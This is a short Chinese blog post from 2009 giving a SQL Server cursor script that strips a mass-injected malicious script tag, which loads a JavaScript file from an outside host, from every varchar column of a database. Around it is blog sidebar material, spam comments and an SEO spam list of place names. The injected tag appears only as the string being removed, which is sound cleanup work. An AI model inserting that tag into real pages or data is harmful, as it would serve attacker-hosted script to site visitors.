<strike id="cwia2"></strike>

<del id="cwia2"></del>

游標(biāo)刪除注入代碼

游標(biāo)刪除注入代碼

DECLARE @fieldtype sysname
SET @fieldtype='varchar'

--刪除處理
DECLARE hCForEach CURSOR GLOBAL
FOR
SELECT N'update '+QUOTENAME(o.name)
    +N' set '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script_src=http://ucmal.com/0.js> </script>'','''')'
FROM sysobjects o,syscolumns c,systypes t
WHERE o.id=c.id
    AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
    AND c.xusertype=t.xusertype
    AND t.name=@fieldtype
EXEC sp_MSforeach_Worker @command1=N'?'

其實他也是這樣注入的

posted on 2009-04-25 10:54 sanmao 閱讀(73) 評論(0) 編輯收藏

新用戶注冊刷新評論列表


只有注冊用戶登錄后才能發(fā)表評論。




網(wǎng)站導(dǎo)航: 博客園 IT新聞 Chat2DB C++博客博問管理

常用鏈接

留言簿(5)

隨筆分類

隨筆檔案

搜索

最新評論

1.?re: 解決方法:An error occurred on the server when processing the URL. Please contact the system administrator
太謝謝你了服務(wù)器搞了幾天了網(wǎng)上搜索一大堆加個端口就OK了郁悶！~
--謝謝你
2.?re: PowerDesigner使用教程|使用方法
評論內(nèi)容較長,點擊標(biāo)題查看
--RYJ
3.?re: PowerDesigner使用教程|使用方法
大愛樓主啊~
--RYJ
4.?re: 連續(xù)循環(huán)向上滾動代碼
恭喜快捷付一卡通張先生借款202522，成功打入卡中
--啥都吃
5.?re: jquery-1.5.2.min js下載
好
--啊啊啊
6.?re: 解決方法:An error occurred on the server when processing the URL. Please contact the system administrator
幫我解開
--段秀林
7.?企業(yè)班組長管理證書
查找證書
--朱培義
8.?re: Oracle 11g 下載|Oracle 11g 官網(wǎng)下載|Oracle 11g 官網(wǎng)下載帶登錄用戶和密碼
樓主你那賬號好像登不了
--學(xué)咖妃的菜鳥
9.?re: ORACLE 10g下載|ORACLE 10g下載地址|ORACLE 10g官網(wǎng)下載地址[未登錄]
感謝樓主現(xiàn)在oracle10G 實在不好找了感謝分享這么全的一文在手天下我有
--wj
10.?re: 解決方法:An error occurred on the server when processing the URL. Please contact the system administrator[未登錄]
ssss
--s
11.?re: jquery ui dialog|popup 彈出窗口層
單獨的
--單獨的
12.?re: jquery ui dialog|popup 彈出窗口層
出錯的vV熱情
--單獨的
13.?re: [導(dǎo)入]MyEclipse 8.5 M1注冊碼|MyEclipse 8.5 M2注冊碼
asdf
--潘坤
14.?re: PowerDesigner使用教程|使用方法[未登錄]
第二個畫圖的工具怎么點出來啊
--1
15.?re: 水晶報表的顯示報表數(shù)據(jù)[未登錄]
123456
--123
16.?re: PowerDesigner使用教程|使用方法
學(xué)的很好啊，謝謝樓主
--四海驕陽
17.?re: Ext.grid.GridPanel |屬性|方法|配置|詳細(xì)介紹
asdf
--asdf
18.?re: oracle 12c 下載|oracle 12c 官網(wǎng)下載帶用戶名密碼|oracle 12c for windows64下載
登錄不了啊
--Stevies
19.?re: oracle 12c 下載|oracle 12c 官網(wǎng)下載帶用戶名密碼|oracle 12c for windows64下載
謝謝！
--Stevies
20.?re: oracle 12c 下載|oracle 12c 官網(wǎng)下載帶用戶名密碼|oracle 12c for windows64下載
謝謝，有Linux的就更好了
--oracle
21.?re: Oracle 11g 下載|Oracle 11g 官網(wǎng)下載|Oracle 11g 官網(wǎng)下載帶登錄用戶和密碼[未登錄]
現(xiàn)在怎么不能下載了
--1
22.?re: PowerDesigner使用教程|使用方法
學(xué)習(xí)了~
--RYJ
23.?re: PowerDesigner使用教程|使用方法[未登錄]
@haha
好的，不錯
--test
24.?re: oracle 12c 下載|oracle 12c 官網(wǎng)下載帶用戶名密碼|oracle 12c for windows64下載[未登錄]
謝謝博主，謝謝各位
--java
25.?re: PowerDesigner使用教程|使用方法
謝謝樓主的分享，非常感謝
--kz
26.?re: PowerDesigner使用教程|使用方法
學(xué)習(xí)了
--rommr
27.?re: jquery ui dialog|popup 彈出窗口層[未登錄]
11
--1
28.?re: 留言框代碼
人發(fā)發(fā)是否飛灑發(fā)放發(fā)送法爾范薩芬
--安安
29.?re: PowerDesigner使用教程|使用方法
請問下樓主我用腳本反向生成model 怎么講腳本里面的comment在model里面也有（我用的是DB29.1）。
--anuous
30.?re: ORACLE 10g下載|ORACLE 10g下載地址|ORACLE 10g官網(wǎng)下載地址
樓主真是個好人
--zero_cool
31.?re: 在分析向此請求提供服務(wù)所需資源時出錯。請檢查下列特定分析錯誤詳細(xì)信息并適當(dāng)?shù)匦薷脑次募未登錄]
評論內(nèi)容較長,點擊標(biāo)題查看
--周周
32.?re: 清華it證書查詢網(wǎng)
結(jié)業(yè)證書
--嚴(yán)定美
33.?re: 獲取域名的正則表達(dá)式
www.baidu.com/music
--yj
34.?re: PowerDesigner使用教程|使用方法[未登錄]
very good
--...
35.?re: ORACLE 10g下載|ORACLE 10g下載地址|ORACLE 10g官網(wǎng)下載地址
太感謝分享個賬戶來下載軟件了。謝謝
--ChurKen
36.?re: oracle 12c 下載|oracle 12c 官網(wǎng)下載帶用戶名密碼|oracle 12c for windows64下載
謝謝博主了，超級感謝
--#r
37.?re: oracle 12c 下載|oracle 12c 官網(wǎng)下載帶用戶名密碼|oracle 12c for windows64下載[未登錄]
謝謝博主，賬號分享超級給力，也謝謝樓上各位沒有改密碼，讓大家都能用、、、
--葉
38.?re: q寵寶貝卸載|怎么卸載
太煩人了
--莜何
39.?re: Oracle 11g 下載|Oracle 11g 官網(wǎng)下載|Oracle 11g 官網(wǎng)下載帶登錄用戶和密碼
THANKS!
--666
40.?re: web打印控件|打印預(yù)覽[未登錄]
11111111111111111111111111111111111111
--111

閱讀排行榜

評論排行榜

主站蜘蛛池模板：陆良县| 北川| 铁力市| 桦川县| 邯郸县| 南陵县| 当阳市| 南城县| 肃南| 宜宾县| 淳化县| 桐庐县| 临夏市| 福建省| 大兴区| 镇江市| 大新县| 隆林| 凉城县| 平潭县| 溆浦县| 华宁县| 祁连县| 台中市| 东辽县| 宜春市| 吉水县| 宁阳县| 浏阳市| 内黄县| 普陀区| 忻城县| 富锦市| 寿阳县| 霍城县| 资溪县| 图木舒克市| 上饶县| 佛教| 万载县| 靖州|

<ul id="ea2wm"></ul>

<strike id="ea2wm"><input id="ea2wm"></input></strike>

<del id="ea2wm"></del>

<strike id="ea2wm"><input id="ea2wm"></input></strike>